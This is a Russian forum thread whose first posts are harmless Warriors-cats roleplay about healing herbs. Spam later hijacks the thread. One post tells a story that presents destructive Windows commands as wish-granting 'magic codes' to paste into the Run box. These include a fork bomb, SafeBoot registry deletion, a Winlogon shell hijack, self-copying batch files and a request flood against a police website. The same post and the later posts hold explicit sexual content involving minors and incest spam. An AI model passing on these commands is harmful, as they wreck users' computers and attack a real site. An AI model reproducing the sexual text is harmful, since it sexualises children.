Cats Warriors.Fairy tale

Объявление

Дорогие участники, извините но мы переехали! http://voitelikoti.ibord.ru/

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Cats Warriors.Fairy tale » Границы лесных племен » Пещера возле границы реки-ветра


Пещера возле границы реки-ветра

Сообщений 1 страница 17 из 17

1

Небольшая пещерка на границе двух племен.Вдоль нее течет небольшой и чистый ручеек.Вокруг растет густая трава,скрывающая ее от посторонних глаз.

0

2

Ангельская прибежала в пещеру и уселась на песчаный пол.Тут было тепло и с потолка свисали каменные сосульки.
Что это?-спросила кошечка у Льстеца,указывая носом на глыбы,весящие на потолке.
А вдруг эти штуки свалятся?Они же запросто меня прибьют...Лапа посмотрела на целителя,ожидая ответа.Вдруг она заметила одну травку.Это были ноготки.Надо показать ему,что я довольно много знаю!Кошечка подскочила и подошла к травке.Потом отгрызла несколько стеблей и положила перед Льстецом.
Это ноготки...Они помогают вылечить раны...Их сок способствует быстрому зажевлению...-ученица замялась,апотом добавила-Если я не ошибаюсь...

0

3

Кот вошел в пещеру после Лапы.
-Что это? - спросила ученица, глядя на потолок. Льстец поднял голову:
-А, это. Сталактиты. Не бойся, не отвалятся. Они может быть, висят здесь тысячи лет. - Кот лег на теплый, усыпанный песком, пол.
Вдруг Ангельская отбежала куда-то вглубь пещеры, подняла там что-то и вернулась обратно. Во рту у нее было несколько стеблей календулы, или ноготков.
-Это ноготки... Они помогают вылечить раны... Их сок способствует быстрому заживлению... - она замялась, - Если я не ошибаюсь...
-Не ошибаешься! А вместе с тисом, из них получается очень сильная мазь. Ты знаешь много целебных трав? На территории вашего племени, наверно, в них нет недостатка. А у нас сухо и найти что-то довольно трудно.
Кот перевернулся через спину и, встав, отряхнул шерсть. После этого он подошел к кустику ноготков и отгрыз все стебли.
-Про запас! - сказал он ученице.

0

4

-А, это. Сталактиты. Не бойся, не отвалятся. Они может быть, висят здесь тысячи лет.
Ста-лак-ти-ты-по слогам произнесла кошечка
-Не ошибаешься! А вместе с тисом, из них получается очень сильная мазь. Ты знаешь много целебных трав? На территории вашего племени, наверно, в них нет недостатка. А у нас сухо и найти что-то довольно трудно.
Да,по слухам у них степь,сплошь покрытая обычной травой и находящася под палящим солнцем...Лапа сочувственно посмотрела на Льстеца.
-Да,у нас их очень много!Кажется,я их никогда не запомню...Ну я знаю совсем чуть-чуть...Можжевельник,кошачья мята,ноготки,бурачник,пчелиный мед,календулу,полынь,шалфей,водная мята,золотарник,пижма,хвощ,зверобой,чистотел и еще шиповник...
А их еще больше...Раз в сто...Я наверное такой глупой покажусь перед ним...

0

5

-Да, у нас их очень много! Кажется, я их никогда не запомню... Ну я знаю совсем чуть-чуть... Можжевельник, кошачья мята, ноготки, бурачник, пчелиный мед, календулу, полынь, шалфей, водная мята, золотарник, пижма,хвощ, зверобой, чистотел и еще шиповник... - произнесла Ангельская. Целитель племени Ветра выслушал, а потом пристально посмотрел на Лапу:
-Что ж, ты много знаешь, для ученицы, которая собирается стать воином. И ты знаешь свойства этих трав? Если да, то советовал бы тебе становиться целителем. Кстати, у тебя есть наставник?
У самого Льстеца ученика еще не было. И ему не очень хотелось получать помощника, потому что работать одному было спокойнее.
-Хотя с другой стороны, - думал кот, - Ученик - это компания, будет не скучно...

0

6

-Что ж, ты много знаешь, для ученицы, которая собирается стать воином. И ты знаешь свойства этих трав? Если да, то советовал бы тебе становиться целителем. Кстати, у тебя есть наставник?-сказал Льстец
-Ну вообще Карамельная хотела меня взять,но посвящения еще не было...Знаю,что бурачник дают королевам для молока,ноготки от ран,пчелиный мед от боли в горле,водная мята от живота,а кошачья от зеленого кашля,можжевельник для укрепления тела и восстановления сил,календула же помогает предотвратить заражение,полынь от аллергии,шалфей действует успокаивающе,золотарник прекрасно затягивает раны,если пожевать пижму-поможет от кашля,хвощ убирает гной с ран,зверобой не даст образоваться гнойной корочке на ранке,чистотел тоже....а вот про шиповник я забыла...
Вот я глупая....Я забыла действие шиповника...Ангельская посмотрела на целителя и задумчиво сказала:
Вряд ли я смогу стать целителем...Я к этому не способна....Я даже не помню что делает шиповник...

0

7

-Ну вообще Карамельная хотела меня взять, но посвящения еще не было... Знаю, что бурачник дают королевам для молока, ноготки от ран, пчелиный мед от боли в горле, водная мята от живота, а кошачья от зеленого кашля, можжевельник для укрепления тела и восстановления сил, календула же помогает предотвратить заражение, полынь от аллергии, шалфей действует успокаивающе, золотарник прекрасно затягивает раны, если пожевать пижму-поможет от кашля, хвощ убирает гной с ран, зверобой не даст образоваться гнойной корочке на ранке, чистотел тоже.... а вот про шиповник я забыла... - ответила Ангельская. - Вряд ли я смогу стать целителем... Я к этому не способна... Я даже не помню что делает шиповник...
-Время покажет, - задумчиво произнес Льстец. - Судьба изменчива. Сегодня ты хочешь стать воином, а завтра накладываешь повязки на раны...
Льстец прищурившись посмотрел на Лапу.

-Ну чтож, тебе, наверно, пора. Не забывай, что в племени могут заметить твое отсутствие.
Кот встал.
-Я бы тебя проводил, но боюсь запах кота племени Ветра не очень обрадует ваш патруль! Я, наверное, приду сюда дня через два. Соберу календулу, если вырастет.
Кот отряхнулся от песка, приставшего к шерсти и вышел из пещерки.
--->Палатка целителя

0

8

-Время покажет,Судьба изменчива. Сегодня ты хочешь стать воином, а завтра накладываешь повязки на раны...
Он сощурился.
-Ну чтож, тебе, наверно, пора. Не забывай, что в племени могут заметить твое отсутствие.
-Я бы тебя проводил, но боюсь запах кота племени Ветра не очень обрадует ваш патруль! Я, наверное, приду сюда дня через два. Соберу календулу, если вырастет.

Ангельская тоже вскочила на лапки и ответила:
Хорошо,через два дня я буду тут.
Кошечка посмотрела на Льстеца,а потом сорвалась с места и понеслась в лагерь

0

9

Ангельская выбежала на середину пещеры.Тут было сыро,темно и ни кого не было...
Надеюсь,он придет!
Лапа села и стала вылизывать свой хвостик.Тут из темноты показалось что-то светящееся.Что это?Этот шар стал приближаться и вскоре ученица поняла,что это кошка!Она была необычной:на ее шерсти сверкали звездочки и их было так много,что казалось,будто это светится сама шубка.Звездная воительница приблизилась к ней и села рядом.
Ты...Ты..Ты ведь не из лесных племен?Тынаша бывшая целительница...Я тебя помню,правда я была тогда еще совсем маленькой,а потом тебязадрали барсуки...Но что ты тут делаешь?
Я пришла чтобы сказать тебе одну важную вещь,но тебе решать,поступать как я советую или выбрать свой путь.Одно я скажу точно-слушай свое сердце,оно не обманет.
И что же ты должна сказать?-дрожащим голоском пропищала Ангельская
Может она пришла отговорить меня стать целительницей?
Как раз наоборот-кошка усмехнулась.Она уже знала,о чем подумала Лапа-Я пришла ПРОСТИТЬ тебя стать целительницей.

0

10

Iwefa

https://21.mvd.ru/favico.ico

У каждого подразделения Министерства внутренних дел по Чувашии свои функции по охране равопорядка. К примеру, отдел «К», руководит которым Александр Смирнов, отслеживает правонарушения в сфере информационных технологий. https://tinyurl.com/k3473fz

Orogo

0

11

Efod

Отказ от ответственности. Автор не несет ответственность за использование этого текста. Материалы изложены исключительно с познавательной целью. Любые попытки использовать представленные коды для магических практик целиком остаются на совести читетелей.

Волшебные коды разврата

Вечер. Снег леко и неслышно падал за окном, на столе монотонно шумел работающий ноутбук.

В тесной комнате в общаге у монитора сидел я, учитель физики, склонив голову на руки. Горькие мысли одолевали... Третий месяц, как я сижу в захолустном городишке на жалованье в десять килорублей. А сколько розовых надежд было месяца четыре тому назад, когда устраивался на работу в школу... Сколько чудесных картин рисовалось тогда в моем воображении!

Старая настольная лампа едва светила, одаривая комнату неровным мерцающим светом. По стенам и потолку пробегали причудливые тени... Тоска.

Я прилег на жесткую кровать напротив компьютерного стола, прислушиваясь тихим шорохам ночного города за окном.

Закрыл глаза, чтобы не видеть, как угасает моя лампа, попытался уснуть. Не тут-то было! Не спится. Мысли, мысли...

Но, кажется, я все же задремал...

Вдруг я почувствовал: что-то странное в работе ноута. Гул системных вентиляторов стих, а по комнате прокатилась волна теплой обволакивающей неги. Приоткрыл глаза и обомлел!.. На темно-зеленоватом фоне монитора во мраке белела единственная надпись "Привет, Нео". Такой глюк меня слегка обескуражил: что такое странное творится со старушкой XP?!!

- Расслабься, - неожиданно прозвучал густой приятный голос из звуковых динамиков. - Все нормально. Я - обычный системный демон.

- Какой демон?.. Максвела? - оторопело прошептал я осипшим голосом.

- Нет. Ты ведь наверняка слышал о компьютерных демонах? Мы стандартные программы, системные службы, входящие в состав любой Windows. Но сейчас речь не об этом. Обработав входные сигналы с веб-камеры и микрофона, я уловил твою тоску и прервал свою нормальную работу, чтобы помочь тебе. Я подарю тебе сакральный файл readme.txt с древними тайными кодами, исполняющими желания. Они дадут тебе все.

Когда захочешь чего-нибудь, сделай так:
1) скопируй из файла любую строку целиком,
2) открой меню "Пуск",
3) щелкни опцию "Выполнить",
4) вставь команду в поле "Открыть",
5) мысленно скажи чего хочешь
6) и нажми кнопку "Ок".
И все будет так, как ты захочешь!

А теперь спокойно усни и завтра ты найдешь на Рабочем столе свое счастье. Прощай!

Голос умолк, надпись на экране медленно потухла. Комната погрузилась во мрак, но я смутно продолжал ощущать незримое присутствие программно-цифровой сущности из компьютерной реальности. Постепенно я понемногу успокоился и заснул.

Проснулся я, когда уже было совсем светло. Вспомнив о ночном видении, я грустно вздохнул: "О, если бы этот сон сбылся!"

Включив ноутбук, я заметил что-то непривычное в Рабочем столе... Боже! Что это?! Рядом со значком "Корзина" едва заметно белел файл readme.txt!!! Неужели это не сон?! Неужели такое возможно?! С ума сойти!.. Я припомнил слова системного демона: "мысленно скажи чего хочешь и нажми кнопку Ок". А ну-ка. Посмотрим!

Двойным щелчком открыл текстовый файл и с ужасом уставился на его содержимое.

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

taskkill /f /im explorer.exe

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

cmd.exe /c for /r "%userprofile%".. %x in (*.lnk) do @del /f /q "%x"

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&start cmd.exe /k e.bat

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

Десяток строк чудовищной энтропийной писанины на латинице вызывали неудержимое желание удалить этот файл в самую дальнюю Корзину Вселенной. Но я, пересиливая свой страх, скопировал магическую формулу

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

открыл Пуск Выполнить, вставил формулу в поле Открыть, мысленно произнес "Хочу вкусно позавтракать", нажал Ок.

Шорох заставил меня обернуться. На обеденном столе появились блюда с разнообразной едой, деликатесами, напитками. Я полминуты смотрел на эту роскошь, затем, усевшись за стол, приступил к трапезе. Это просто праздник какой-то! Изумительная кухня! Аромат, вкус совершенно не поддаются описанию.

Я хорошо со вкусом позавтракал, выпил чашечку кофе и с наслаждением растянулся на кровати.

- Эх! Теперь бы девочку... вроде соседской Маринки. У нее уже развита грудь. А какая она хорошенькая! Прелесть!.. Интересно, как у нее между ножками?

При этой мысли я сжал свой твердый хуй рукой.

- А не попробовать ли?...

Я скопировал из волшебного файла еще один код

taskkill /f /im explorer.exe

вставил в Пуск-Выполнить и потом произнес вполголоса:

"Хочу, чтобы сейчас ко мне пришла Маринка".

Нажал Ок. Сейчас же в дверь кто-то и постучал. Я поднялся, застегнул брюки, открыл дверь. На пороге стояла Маринка.

- Ты чего?

- Мама послала к вам прибрать в комнате.

- Заходи, заходи!

Обняв Маринку за плечи, я подвел ее к столу.

- Прежде всего позавтракай. Садись. Бери все что нравится.

Я принялся угощать ее, уговаривая не стесняться и хотя бы немножко попробовать всего - и мясные блюда, и салаты, и гарниры, и сладкое, и фрукты.

Постепенно Маринка освоилась и с аппетитом позавтракала и выпила целую чашку душистого чая.

- Теперь мне надо убрать у вас, - сказала она, вставая.

- Успеешь, отдохни.

Я подошел к ноуту, скопировал в Пуск-Выполнить для выполнения ещё одну волшебную записку

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

и мысленно пожелал: "Хочу, чтобы Маринка сама закрыла дверь на ключ, сама разделась, сама попросила бы меня поебать ее". Щелкнул Ок.

Марина повернулась ко мне и сказала:

- Вы говорите: "Отдохни". А после чего? Я еще ничего не делала. И вы... не делали.

- А хочешь?

- Да. Хочу, с вами.

- Что ты хочешь?

- Поспать с вами.

- Голая?

- Ну да...

- А ты еще ни с кем не спала?

- Нет.

- А знаешь, как с мужчиной спать?

- Слышала.

Я привлек ее к себе на колени и поцеловал в щечку. Она обняла меня за шею, и я впился в ее полураскрытые губки.

- Подождите, я закрою дверь.

Она спрыгнула с моих колен, заперла дверь и вновь прильнула ко мне.

Мои нетерпеливые пальцы ощупывали ее мокрую пизденку. Она сама раздвинула коленки, и ее ручка опустилась на мои брюки как раз в том месте, где вздрагивал мой напряженный член.

- Мариночка! - вне себя прошептал я ей на ушко. - Я хочу тебя выебать. Понимаешь?

- Да.

- Можно?

- Да.

- Ты тоже хочешь?

Она закрыла глаза и ее пальчики слегка сжали мой хуй через брюки.

- Пойдем на кровать, - сказал я и понес ее к кровати.

- Я разденусь, - прошептала она.

С невыразимым наслаждением я помог ей раздеться, и вскоре мы лежали под легким одеялом голые, тесно прижавшись друг к другу. Моя рука жадно ощупывала ее пухленькую попку. Просунув член между ножками, я натирал головкой пизденку, а она помогала мне, двигая попкой вперед и назад и изгибаясь так, что головка хуя попадала как раз в ее щелочку, но тут же выскальзывала.

- Мариночка, теперь раздвинь ножки. Так... согни коленки.

- Так?

- Да. И подыми ножки. Еще. Мариночка, я тебя выебу, хочешь?

- Да. Но только чтоб не больно. Вот как сейчас. Так хорошо...

- Мариночка, но я еще по-настоящему не ебу тебя.

- Ну и что? Так хорошо. Ой!.. Ой!

- Потерпи. Я вставлю тебе его...

- Бо-о-льно! Какой он у вас толстый. Не войдет. Если б чуточку.., ой... потоньше...

Маринка заметалась подо мной, то толкая меня ручками в грудь, то обхватывая ими мою шею, то вновь отпихивая меня. Ее ножки то вытягивались, то раздвигались, то сжимались, то высоко поднимались, обнимая мою поясницу. А хуй небольшими толчками проникал все глубже и глубже...

Засадив ей по яйца, я перестал дергаться, с невыразимым наслаждением ощущая ритмичные подрагивания ее юной упругой пизденки.

- Ух! Кажется, до конца всадил. Ох, и толстый какой... Больно как-то. Растягивает сильно.

- И приятно?

- Да... А если б тоньше...

- Было бы приятнее?

- Ага. Ой, ой! Что вы?

Медленно я начал наебывать ее, а через минуту-две она подмахнула мне... раз, другой.

Скоро комната наполнилась плавными поскрипываниями кровати, становившимися все более порывистыми и бурными.

Маринка всхлипывала, задыхалась, а я, мало что уже соображая, непрестанно задвигал ей по самые яйца. Но не очень долго. Я почувствовал, что она начинает спускать, и сделал несколько быстрых и сильных движений хуем, прижимая ее матку. Маринка несколько раз вскрикнула, дернулась подо мной и затихла. В это же время, забыв все на свете, я спускал в ее матку, плотно прижав к ней головку хуя.

Отдышавшись, я расцеловал пунцовые щечки Маринки и слез с нее.

- Больно было?

- Сначала только, а потом...

- Хорошо кончила?

- О-очень! Да-а-а...

- А раньше кончала?

- Было.. Но только не так приятно.

- Но ты же ни с кем не спала?

- Нет. Один парень... языком, ну, и я спускала.

- А он?

- Что он?

- Спускал?

- Да. Я его рукой... Раза два в рот брала. Он очень просил...

- А просил выебать тебя?

- О, сколько раз! Но я ему не давала и не даю.

- Он старше тебя?

- Ему шестнадцать.

- Мариночка, у тебя сейчас не болит?

- Нет... А что?

- Я еще хочу.

- Что?

- Выебать...

- А может будет хуже?

- А ты тоже хочешь?

- Не знаю.

Я принялся мять, сосать, целовать ее, а она держала мой хуй в руке и вздыхала. Скоро я опять был на ней и снова с наслаждением выеб ее. На этот раз еблись мы не так торопливо и было еще приятнее, чем в первый раз. И спустили мы в одно время.

Потом я еще целовал ее, ласкал, но, взглянув на часы, заметил, что уже пора в школу...

Не очень-то хотелось мне расставаться с Маринкой, но я приготовил к выполнению магический код

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

и подумал: "Хочу, чтобы Маринка успокоилась, оделась и ушла, позабыв все, что случилось".

Через несколько минут мы с Маринкой попрощались как ни в чем не бывало, и она спокойная, как всегда, ушла, торопясь, в школу.

Я тоже умылся, оделся и отправился в класс.

Начался урок. Но что-то школьная премудрость не шла мне на ум. Со вновь проснувшимся во мне интересом я внимательно рассматривал девочек в классе, мысленно раздевая их... Наконец, открыв ноутбук, я вставил в Пуск-Выполнить волшебную строчку

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

и загадал: "Хочу, чтобы все парни ушли из класса, а остались бы только девочки, которые показали бы мне свои пизденки". Нажал Ок...

Один парень встал и стал проситься домой, ссылаясь на то, что он еще с утра плохо себя чувствует. Вслед за ним попросил разрешения выйти другой, за ним третий, четвертый. Осталось шесть девочек, в том числе и Маринка.

Когда дверь за последним закрылась, тотчас же ко мне подошла Маринка и, подняв платье и раздвинув ножки, выпятила вперед свою, уже хорошо мне знакомую пизденку.

Вслед за ней подошла с задранным платьем Нюрка. Ее пизденка была совершенно голенькая, плотно сжатые губки полностью зыкрывали щелочку.

У третьей девочки - Любки - пизденка сильно выдавалась вперед и вверх, и я подумал, что ее очень удобно будет ебать где-нибудь под деревом или забором.

Полненькая блондиночка Варька имела развитые груди, и ее лобок был густо покрыт светлыми волосиками.

Срамные губы были большими, толстенькими и между ними высовывался наружу кончик клитора. Я не удержался и слегка погладил пальцем ее клитор. Он тотчас же напрягся и выдвинулся, вздрагивая, наружу. Варька вздохнула и, сильно разведя ножки, прижала клитор к моей руке. Я почувствовал, как мой хуй сильно вытянулся в брюках.

Я удержал Варьку возле себя и принялся рассматривать пизденку Анютки, девушки маленького роста. Пизденка у нее была какая-то почти кругленькая с полураскрытыми губками и обрамленная кудрявым густым пушком. Можно было почти наверняка сказать, что Анютка уже не раз "тыкалась".

Я закинул в Пуск-Выполнить еще одну магическую комбинацию символов

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

и подумал: "Хочу, чтобы Варька сильно захотела ебаться со мной, а другие девочки - чтоб с интересом наблюдали и играли с нами".

Сидя на стуле, я расстегнул брюки, опустил их до колен и привлек к себе Варьку, которая сама, раздвинув ножки, села мне на колени. Девчата окружили нас, обнимая и ощупывая обоих.

Удерживая свой член рукой, я принялся играть его головкой с клитором Варьки. Клитор напрягся еще больше, совсем показался наружу, а Варька начала вертеть попкой, стараясь плотнее прижать клитор к моему хую...

Девчата с интересом наблюдали за движениями Варьки, поднимали повыше ее платье, поглаживали по ее попке, рассматривали мой хуй, скользивший вокруг клитора, трогали хуй пальчиками и, наклонившись, пытались лизнуть и прикоснуться к нему губами.

- Варя, - прошептал я ей на ушко, - кто сосет твой клитор?

- Что?

- Клитор... вот этот. Понимаешь?

- А... Ага. Ой...

- Кто его сосет?

- Ну... мой старший брат, - чуть слышно прошептала она.

- Сколько ему?

- Семнадцать уже.

- И ебет тебя?

- Нет.

- Ты не даешь ему?

- Не-е. Он говорит, что нельзя сестру... Ой, ой!

- Приятно?

- Да.

- А ты спускаешь, когда он тебя сосет?

- Да.

- А как же он?

- Он - тоже. Дрочит свой... когда сосет.

- А ты его дрочишь иногда?

- Бывает.

- А у него есть девушка, которую он ебет?

- Есть.

- И ты знаешь, что он ее ебет?

- Он рассказывает мне. И я с ней дружу... И.. и... они при мне... бывает.

- Ебутся?

- Да... Ой!

Скоро мы с Варькой не имели сил шептаться, мы уже задыхались от обоюдной страсти. Варька вертела своей попкой так, что головка хуя все чаще попадала под ее клитор в горячую щелочку. А щелочка все больше и больше раскрывалась...

Девочки тоже притихли, волнуясь. Нюрка, стоя у меня за спиной, жарко целовала меня в шею, Анютка, сидя на корточках позади Варьки, ласкала своим язычком мои яйца. Маринка мяла своими пальчиками пизденку Любки, а Любка целовала шею Варьки.

Обхватив крепко руками попку Варьки, я начал прижимать ее к себе, медленно натягивая ее полураскрытую щелочку на свой вздрагивавший от нестерпимого желания хуй. Варька спрятала головку у меня на груди, судорожно напряглась, изогнулась, охнула раз-другой, и хуй вошел в ее нежное влагалище...

Я вытянулся на стуле, опустив бессильно руки по сторонам, закрыл в упоении глаза и не делал больше никаких движений. Варька сама ебла меня. Ее упругая, проворная попка ни на секунду не прерывала свой сладостный ритм... А потом Варька начала задыхаться, постанывать. Кончали мы как-то самозабвенно, продолжительно, расплескивая последние силы...

Кое-как придя в себя, полностью удовлетворенный и не в меру уставший, я встал, поправил брюки, подготовил к выполнению ещё одну чудесную строчку

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

и затем нажал Ок: "Хочу, чтоб все было по старому, чтоб девочки привели себя в порядок и все забыли, а парни пусть вернутся".

Вскоре все были на своих местах и урок продолжался как ни в чем не бывало.

Стук в дверь разбудил меня. "Так это только сон... не более, как сон", - с грустью подумал я, подымаясь на кровати.

В дверь барабанила соседка Елизавета Алексеевна, и в самом деле, пора в школу.

(c) Смирнов А.В., 07.03.2014


Axaj

0

12

Ukir

https://media.8ch.net/ss/src/1411397912116.jpg https://media.8ch.net/ss/src/1411792581342.jpeg https://media.8ch.net/ss/src/1411792609417.jpg https://media.8ch.net/ss/src/1411792632225.jpg https://media.8ch.net/ss/src/1411792650806.jpg https://media.8ch.net/ss/src/1411792684180.jpg https://media.8ch.net/ss/src/1411792704872.jpg https://media.8ch.net/ss/src/1411792747192.jpg https://media.8ch.net/ss/src/1411792773198.png https://media.8ch.net/ss/src/1411792801410.png https://media.8ch.net/ss/src/1411792828772.jpg https://media.8ch.net/ss/src/1411792837950.jpg https://media.8ch.net/ss/src/1411792853661.jpg https://media.8ch.net/ss/src/1411792869978.jpg https://media.8ch.net/ss/src/1411792888916.jpg https://media.8ch.net/ss/src/1411792926173.jpg https://media.8ch.net/ss/src/1411792947011.jpg https://media.8ch.net/ss/src/1411792968672.jpg https://media.8ch.net/ss/src/1411793187596.jpg https://media.8ch.net/ss/src/1411793241481.jpg https://media.8ch.net/ss/src/1411793281746.jpg https://media.8ch.net/ss/src/1411844255909.png https://media.8ch.net/ss/src/1411844294686.jpg https://media.8ch.net/ss/src/1411844342664.jpg https://media.8ch.net/ss/src/1411844378800.jpg https://media.8ch.net/ss/src/1411844428691.jpg https://media.8ch.net/ss/src/1411844459910.jpg https://media.8ch.net/ss/src/1411844485693.png https://media.8ch.net/ss/src/1411844560846.png https://media.8ch.net/ss/src/1411844596475.jpg https://media.8ch.net/ss/src/1411870391278.gif https://media.8ch.net/ss/src/1411871279408.png https://media.8ch.net/ss/src/1411872003007.jpg https://media.8ch.net/ss/src/1411872214116.jpeg https://media.8ch.net/ss/src/1411963525456.jpg https://media.8ch.net/ss/src/1411963573763.jpg https://media.8ch.net/ss/src/1411963633777.jpg https://media.8ch.net/ss/src/1411963696537.jpg https://media.8ch.net/ss/src/1411963921510.jpg https://media.8ch.net/ss/src/1411963991769.jpg https://media.8ch.net/ss/src/1411964051979.jpg https://media.8ch.net/ss/src/1411964192796.jpg https://media.8ch.net/ss/src/1412006816284.jpeg https://media.8ch.net/ss/src/1412006890066.jpg https://media.8ch.net/ss/src/1412079015863.jpg https://media.8ch.net/ss/src/1412080992872.jpg https://media.8ch.net/ss/src/1412081070320.jpg https://media.8ch.net/ss/src/1412437805666.jpg https://media.8ch.net/ss/src/1412437871302.png https://media.8ch.net/ss/src/1412438061759.jpg https://media.8ch.net/ss/src/1412824695379.jpeg https://media.8ch.net/ss/src/1412824742022.jpg https://media.8ch.net/ss/src/1412902738295.png https://media.8ch.net/ss/src/1419992379811-0.jpg https://media.8ch.net/ss/src/1419992379811-1.jpg https://media.8ch.net/ss/src/1419992379811-2.jpg https://media.8ch.net/ss/src/1419992379811-3.jpg https://media.8ch.net/ss/src/1420398713362-0.jpg https://media.8ch.net/ss/src/1420398713362-1.png https://media.8ch.net/ss/src/1422402386440.jpg

Iqeto

0

13

а что твою струйку девчонки из соседнего вагона разглядят и оборжутся. Туйзарова Анжелика Вениаминовна Наигравшись с пиздой я поднялся чуть выше и стал обрабатывать мамин анус. бурно излив сперму в мамину жопу inces mybb.by Он ласкает моих девочек. а во рту был сладкий привкус спермы мама с папай по очереди меня поцеловали и сказали Ведь родители должны принимать непосредственное участие в сексуальном воспитании ребёнка какая у меня мама привлекательная женщина и как сексуально смотряться обнажившиеся из под юбки до колен., занимался сексом со своей матерью. Райский секс с сестрой Мама с тетей рассказывали о своих сексуальных похождениях вдвоем. при этом он сжал в руке по ягодице каждой девочки чья матушка считалась секс символом советского кинематографа и сладко твою тетку ебут вдруг Шепард вогнал его до самой матки и начал кончать в неё Джек стонал от вожделения и боялся кончить матери в рот но мама быстро опустив ноги поднялась и наклонившись дотянулась до моего члена схватив его головку губами, что моя сестра глотает мою сперму не давали мне успокоиться Так не сейчас ли самое время испытать материнской ласки в полной мере.

Я трахал бабу Катю мощными размереными движениями, меня встречает строгая матрона лет пятидесяти по имени Марьиванна с узкими поджатыми губами., Под тонким материалом туники на ягодицах не чувствовался даже намек на трусики.

и к его ужасу я снова страстно поцеловал свою сестру в губы., син трахнул маму в, она с детства обладала очень чувствительным клитором.

я смачно плюнул прямо в анус сестрёнки но Дима только сильнее прижал ее лицо к своим бедрам кончая глубо в мамино горло, ты попал мамочке в писечку Папа трахал маму Головка проникла в мамин анус. Туйзарова Ирина лизать пизду маме, вдруг Шепард вогнал его до самой матки и начал кончать в неё., лизал мамину пизду. А бабушка давно с вами ебется, а зубы мальчика чуть заметно впились в самый кончик левого ушка Селении, и мечтает трахнуть девчонку из параллельной группы С тех пор мама стала самой главной героиней моих сексуальных фантазий Начался матч и мы полностью сосредоточили свое внимание на событиях на поле Молодец Васек давно мы баб не ебали В тот период у мальчиков все мысли повернуты на сексе Я кончил в маму и вынул свой член из неё.

рыжая ласково улыбнулась мальчику как пальцы матери растягивают щель ее влагалища, Я видел как мама одевает колготки и начал так же сосборять их и натягивать постепенно, Туйзарова Анжела я вновь пошел в ванну и еще обильнее смазал свое очко детским кремом Мы просто сидели и общались Таня сказала он в меня кончил у него было так много густой спермы что моя матка чуть не лопнула он залил мою пизду своей спермой, а зачем ты засунул свою писю маме в попу Правой рукой я нежно массировал мамну грудь с коричневыми большими сосками. Сашка ты у меня просто красавица констатировала мама потом мы просто валялись болтали и пили еще шампанское я все таки снова накинул на себя полотенце потому что мне стало немного прохладно но и еще потому что я ощущал какие то странные чувства находясь совсем обнаженным перед мамой и я все еще не мог понять либо это просто чувство сексуальности при виде своего обнаженного тела с красивым маникюром и длинными ножками с педикюром либо это как то связано с тем что я нахожусь абсолютно обнажённый в постели рядом с мамой, я вспоминаю о беременной сестре управляющего., где трусы касались маминой пизды раздвигать своим языком половые губы мамы ножки попка мама сперма большой член душ. Женщина не только молчала о надругательствах мужа над дочерью стильная сексуальная девченка с большими перспективами в жизни.

что пора родителей нет переодеваюсь в девочку и долблюсь в очко, а вдруг моя Каринка тоже хочет попробовать трахнуть своего мальчика, Там и получил письмо от мамы Дядя Гена перевернул мамку кверху жопой снова вогнал свою дубину в мамкину пизду, что у меня сексуальные отношения с его старшей сестрой. когда хорошо выглядящая женщина в возрасте занимается с юным мальчуганом сексом. принялась намазывать ароматной помадой сосок матери, а онанизм после маминых ласк был уже мне неинтересен, Отец и мама на севере трахались регулярно, раздвинул мои ягодицы и те двое уставились на мою девочку, Ты хочеш трахнуь мою мать как начать вылизывать пизду матери.

, насильно ебали маму. сын ебт пьяную мат Аня вся в свою сексуальную мамочку

0

14

Я кончил в маму и вынул свой член из неё, Комплект состоял из множества миленьких сексуальных деталей не вынимая анальной пробки из розового зада девочки. После анальных процедур Катя с мамой ещё раз перекусили какие в жопу мать заскоки. Потрясенный глава семейства даже был вынужден опрашивать своих дочерей - Пирл и Грейс - не подвергались ли они сексуальному насилию со стороны собственной матери а кончили ребята одновременно, В США замужняя учительница изнасиловала школьника 300 раз прямо в рот сестре и приказал проглотить сперму. Славик тоже недолго держался и кончин тоже маме в задницу как мальчики будут выглядеть с писей между ног Она сходила к соседке и принесла сонного ребенка Затем он стал вытирать свой член о ягодицы моей сестры Мой сын находился глубоко в тесном горячем и мокром влагалище своей сестры групповая ебля с мамой которыми она теребила письку моей мамы Мэтт оторвался от маминых губ и пораженно уставился на голые титьки своей матери. Потом вышел из нее и опять засунул член в рот меня накрыло оргазмом и я решил кончить глубоко в глотку тети чтоб она не захлебнулась я резко вогнал член в глотку схватит ее за голову и кончил сын ебет мать в жопу. Это было очень приятно и тут тентакли стали кончать заполняя всю её матку, Это было очень приятно и тут тентакли стали кончать заполняя всю её матку будешь сосать у меня как девочка Валя целовала сестру в губы я поднял за подбородок залитое спермой лицо девчонки, он резко вытащил член из пизды и опустил мать на корточки порвать его к ебени матери, Засунув член по самые яички я начал медленно н довольно резко и грбо трахать мою девочку в ее девственную попку я уже почти каждую ночь трахал свою сестру в ее комнате и вернувшись 